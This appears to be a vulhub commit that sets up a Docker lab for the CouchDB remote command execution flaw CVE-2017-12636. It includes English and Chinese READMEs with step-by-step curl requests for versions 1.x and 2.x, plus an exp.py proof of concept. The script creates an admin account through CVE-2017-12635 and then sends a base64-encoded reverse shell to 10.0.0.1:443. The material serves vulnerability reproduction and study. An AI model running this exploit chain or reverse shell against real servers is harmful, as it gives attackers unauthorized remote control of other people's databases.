first commit

couchdb/CVE-2017-12636/README.md

@@ -0,0 +1,93 @@
+# Couchdb Arbitrary Command Execution (CVE-2017-12636)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache CouchDB is an open-source document-oriented NoSQL database, implemented in Erlang. CouchDB uses multiple formats and protocols to store, transfer, and process its data. It uses JSON to store data, JavaScript as its query language using MapReduce, and HTTP for an API.
+
+CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.
+
+Chain [CVE-2017-12635](../CVE-2017-12635) and CVE-2017-12636 to get a unauthenticated remote command execution.
+
+Reference link.
+
+ - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
+ - https://www.exploit-db.com/exploits/44498
+ - http://bobao.360.cn/learning/detail/4716.html
+
+## Vulnerable Environment
+
+API interfaces of Couchdb 2.x and and 1.x are somewhat different, so this vulnerability is exploited in a different way. This environment is about version 1.6.0, if you want to test version 2.1.0, you can use the [CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635).
+
+Start a Couchdb 1.6.0 server.
+
+```
+docker compose up -d
+```
+
+After the startup is complete, browse ``http://your-ip:5984/`` to see the welcome page of Couchdb.
+
+## Exploit explanation
+
+CVE-2017-12636 is a post-authentication RCE, so if you do not know the target administrator password, you can use [CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635) to add an administrator user first.
+
+### Exploit under 1.x
+
+Execute the following requests in sequence to trigger arbitrary command execution.
+
+```
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
+curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language": "cmd", "map":""}' -H 'Content-Type: application/json'
+```
+
+Here, `vulhub:vulhub` is the administrator account and password.
+
+The first request is to add a **query_servers** with the name `cmd` and the value `"id >/tmp/success"`, which is the command we are going to execute later.
+
+The second and third requests are to add a database and document, which can be queried only after it is added here.
+
+The fourth request is to do a query in this Database, a **query_servers** named `cmd` that I added in the first step is used, and finally trigger the command execution.
+
+### Exploit under 2.x
+
+The two APIs I used above have been modified in 2.1.0 and need to be explained in detail here.
+
+Couchdb 2.x introduces clustering, browser the `/_membership` to get the node list.
+
+```
+curl http://vulhub:vulhub@your-ip:5984/_membership
+```
+
+![](1.png)
+
+As you can see, we have only one node here, with the name `nonode@nohost`.
+
+Then, modify the configuration of node `nonode@nohost` as follows.
+
+```
+curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'
+```
+
+![](2.png)
+
+Then, in the same way as the 1.6.0 exploit:
+
+```
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
+```
+
+Couchdb 2.x removed `_temp_view`, so we need to add a `_view` in order to trigger the command defined in `query_servers`:
+
+```
+curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test", "views":{"woyun":{"map":""} }," language": "cmd"}' -H "Content-Type: application/json"
+```
+
+Then commands in `query_servers` will be executed.
+
+## POC script
+
+I wrote a simple POC [exp.py](exp.py), modified the target and command inside the script to your test target, then modified the version to the corresponding Couchdb version (1 or 2), and successfully get the reverse shell:
+
+![](3.png)

couchdb/CVE-2017-12636/README.zh-cn.md

@@ -0,0 +1,90 @@
+# Couchdb 任意命令执行漏洞（CVE-2017-12636）
+
+Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。
+
+在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置`query_server`，这个配置项在设计、执行view的时候将被运行。
+
+影响版本：小于 1.7.0 以及 小于 2.1.1
+
+参考链接：
+
+ - http://bobao.360.cn/learning/detail/4716.html
+ - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
+
+## 测试环境
+
+Couchdb 2.x和和1.x的API接口有一定区别，所以这个漏洞的利用方式也不同。本环境启动的是1.6.0版本，如果你想测试2.1.0版本，可以启动[CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635)附带的环境。
+
+执行如下命令启动Couchdb 1.6.0环境：
+
+```
+docker compose up -d
+```
+
+启动完成后，访问`http://your-ip:5984/`即可看到Couchdb的欢迎页面。
+
+## 漏洞复现
+
+该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用[CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635)先增加一个管理员用户。
+
+### 1.6.0 下的说明
+
+依次执行如下请求即可触发任意命令执行：
+
+```
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
+curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
+```
+
+其中,`vulhub:vulhub`为管理员账号密码。
+
+第一个请求是添加一个名字为`cmd`的`query_servers`，其值为`"id >/tmp/success"`，这就是我们后面待执行的命令。
+
+第二、三个请求是添加一个Database和Document，这里添加了后面才能查询。
+
+第四个请求就是在这个Database里进行查询，因为我将language设置为`cmd`，这里就会用到我第一步里添加的名为`cmd`的`query_servers`，最后触发命令执行。
+
+### 2.1.0 下的说明
+
+2.1.0中修改了我上面用到的两个API，这里需要详细说明一下。
+
+Couchdb 2.x 引入了集群，所以修改配置的API需要增加node name。这个其实也简单，我们带上账号密码访问`/_membership`即可：
+
+```
+curl http://vulhub:vulhub@your-ip:5984/_membership
+```
+
+![](1.png)
+
+可见，我们这里只有一个node，名字是`nonode@nohost`。
+
+然后，我们修改`nonode@nohost`的配置：
+
+```
+curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'
+```
+
+![](2.png)
+
+然后，与1.6.0的利用方式相同，我们先增加一个Database和一个Document：
+
+```
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
+curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
+```
+
+Couchdb 2.x删除了`_temp_view`，所以我们为了触发`query_servers`中定义的命令，需要添加一个`_view`：
+
+```
+curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
+```
+
+增加`_view`的同时即触发了`query_servers`中的命令。
+
+## 利用脚本
+
+写了一个简单的脚本 [exp.py](exp.py)，修改其中的target和command为你的测试机器，然后修改version为对应的Couchdb版本（1或2），成功反弹shell：
+
+![](3.png)

couchdb/CVE-2017-12636/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+  couchdb:
+    image: vulhub/couchdb:1.6.0
+    ports:
+      - "5984:5984"

couchdb/CVE-2017-12636/exp.py

@@ -0,0 +1,41 @@
+#!/usr/bin/env python3
+import requests
+import json
+import base64
+from requests.auth import HTTPBasicAuth
+
+target = 'http://your-ip:5984'
+command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1"""
+version = 1
+
+session = requests.session()
+session.headers = {
+    'Content-Type': 'application/json'
+}
+# session.proxies = {
+#     'http': 'http://127.0.0.1:8085'
+# }
+session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
+  "type": "user",
+  "name": "wooyun",
+  "roles": ["_admin"],
+  "roles": [],
+  "password": "wooyun"
+}''')
+
+session.auth = HTTPBasicAuth('wooyun', 'wooyun')
+
+command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
+if version == 1:
+    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
+else:
+    host = session.get(target + '/_membership').json()['all_nodes'][0]
+    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
+
+session.put(target + '/wooyun')
+session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
+
+if version == 1:
+    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
+else:
+    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')